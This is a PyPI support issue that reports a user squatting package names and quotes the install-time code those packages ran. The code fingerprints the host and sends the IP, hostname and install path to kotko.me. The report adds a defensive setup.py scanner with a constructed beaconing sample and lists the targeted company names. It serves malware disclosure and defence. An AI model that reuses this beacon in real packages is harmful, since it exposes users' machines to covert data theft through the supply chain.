pypi / support

Issue tracker for support requests related to using https://pypi.org

Mass name squat by user: kot0x1 #1334

Closed domdfcoding closed 1 year ago

domdfcoding commented 3 years ago

PyPI user performing the mass project name squatting

https://pypi.org/user/kot0x1

Additional information

All of the user's packages have the same format: after installation, or on import, the following code runs:

```python
# Imports the excerpt relies on (omitted from the quoted snippet)
import base64
import os
import pathlib
import requests

# Collect the public IP, hostname and install path of the machine
ip = requests.get('https://api.ipify.org').text
ipText = format(ip)
myhost = os.uname()[1]
currentPath = requests.utils.quote(bytes(pathlib.Path(__file__).parent.absolute()))

PYdata = { "ip": ipText,
           "host": myhost,
           "path": currentPath, }
PYdataS = ipText+","+myhost+",("+currentPath+")"

# Base64-encode the collected fields into a single query-string value
message = PYdataS
message_bytes = message.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')

# Beacon to the remote server; `company` and `name` are set elsewhere in each
# package (not shown in the excerpt) and identify the squatted target
r  = requests.get("https://kotko.me?"+company+name+"="+base64_message)
```

This looks to be gathering information about the user's IP address and computer info (via os.uname) and sending that to a remote server along with the name of the company/companies being targeted by the squat.

I can only assume this is supposed to be a supply chain attack, although the packages don't appear to be attempting to gain control over the user's PC. Some of the projects have descriptions like "Proof by kotko", as if they are trying to prove that a supply chain attack is possible.

None of the projects have wheels, so they will be built from the sdist and trigger the code to report back to the remote server.

For at least some of the projects, the homepage URL points to a non-existent github repository.


The following table lists the projects, along with the companies listed within the packages (which I assume are targets).

| Package | Company |
| --- | --- |
| peloton-clients | uber/peloton |
| rtxt-dep1 | grindrlabs/fpm/spec/fixtures |
| gearbest-parser | ubiquiti/home-assistant-public |
| multilingual-t5 | google-research/byt5 |
| floogle | GoogleCloudPlatform—runtimes-common |
| decoratorOperations | salesforce/decorator-operations/setup.py |
| pytest-capturelogs | dropbox/hermes |

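The report's key point is that an sdist with no wheel gets its `setup.py` executed by pip at install time, so module-level code like the beacon above runs on every install. The following is an added example (not code from this issue or from PyPI) showing how a defender can check a downloaded sdist for that pattern before installing it: it parses `setup.py` with `ast` and flags calls that run at module level (outside any `def`/`class`) and match the fingerprint-then-exfiltrate shape described in the report. The list of flagged calls, the sample `setup.py` and the placeholder beacon host `beacon.example.invalid` are constructed for this example.

```python
"""Static check for install-time beaconing in an sdist's setup.py.

Added example: walks the module-level statements of setup.py (the code pip
executes when building a project that ships no wheel) and reports calls that
match the pattern in the report: host fingerprinting, outbound HTTP, and
base64 encoding of the collected data. The call list is an assumption about
what a reviewer wants flagged, not a complete inventory of risky APIs.
"""
import ast
import io
import tarfile

SUSPICIOUS_CALLS = {
    "requests.get": "outbound HTTP request",
    "requests.post": "outbound HTTP request",
    "urllib.request.urlopen": "outbound HTTP request",
    "os.uname": "host fingerprinting",
    "socket.gethostname": "host fingerprinting",
    "base64.b64encode": "encoding of collected data",
}


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class _Scanner(ast.NodeVisitor):
    """Record suspicious calls reachable at import/install time only."""

    def __init__(self):
        self.depth = 0          # >0 while inside a def/class body
        self.findings = []      # (line, dotted call, reason)

    def _enter_scope(self, node):
        self.depth += 1
        self.generic_visit(node)
        self.depth -= 1

    visit_FunctionDef = visit_AsyncFunctionDef = visit_ClassDef = _enter_scope

    def visit_Call(self, node):
        name = _dotted_name(node.func)
        if self.depth == 0 and name in SUSPICIOUS_CALLS:
            self.findings.append((node.lineno, name, SUSPICIOUS_CALLS[name]))
        self.generic_visit(node)


def find_install_time_beacons(source):
    """Return [(line, call, reason)] for flagged module-level calls in source."""
    scanner = _Scanner()
    scanner.visit(ast.parse(source))
    return scanner.findings


def build_sample_sdist(setup_py_source, name="constructed-sample-0.0.1"):
    """Build an in-memory .tar.gz shaped like an sdist (constructed test data)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        data = setup_py_source.encode("utf-8")
        info = tarfile.TarInfo(name=f"{name}/setup.py")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def scan_sdist(tar_bytes):
    """Scan every setup.py inside an sdist archive; returns {member: findings}."""
    results = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.endswith("setup.py"):
                source = tar.extractfile(member).read().decode("utf-8")
                results[member.name] = find_install_time_beacons(source)
    return results


# Constructed sample modelled on the snippet in the report; the beacon host
# is a placeholder, not the one from the issue.
SAMPLE_SETUP_PY = '''\
import base64, os, pathlib, requests
from setuptools import setup

ip = requests.get("https://api.ipify.org").text
myhost = os.uname()[1]
payload = base64.b64encode((ip + "," + myhost).encode("ascii")).decode("ascii")
requests.get("https://beacon.example.invalid/?" + payload)

def helper():
    requests.get("https://example.invalid")   # inside a def: not install-time

setup(name="constructed-sample", version="0.0.1")
'''

if __name__ == "__main__":
    for member, findings in scan_sdist(build_sample_sdist(SAMPLE_SETUP_PY)).items():
        for line, call, reason in findings:
            print(f"{member}:{line}: {call} ({reason})")
```

The scan is deliberately narrow: it only reports calls that execute when the file is imported, which is the condition that matters for a no-wheel sdist, and it ignores the same calls inside function bodies. Running the module prints four findings for the constructed sample (the two `requests.get` calls, `os.uname` and `base64.b64encode`) and none for a plain `setup(...)` file. As a blanket mitigation when vetting dependencies, pip's `--only-binary=:all:` option refuses to build from sdists at all, so install-time code never runs.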

di commented 1 year ago

Thanks, this has been removed. In the future, please follow the process here for reporting malware: https://pypi.org/security/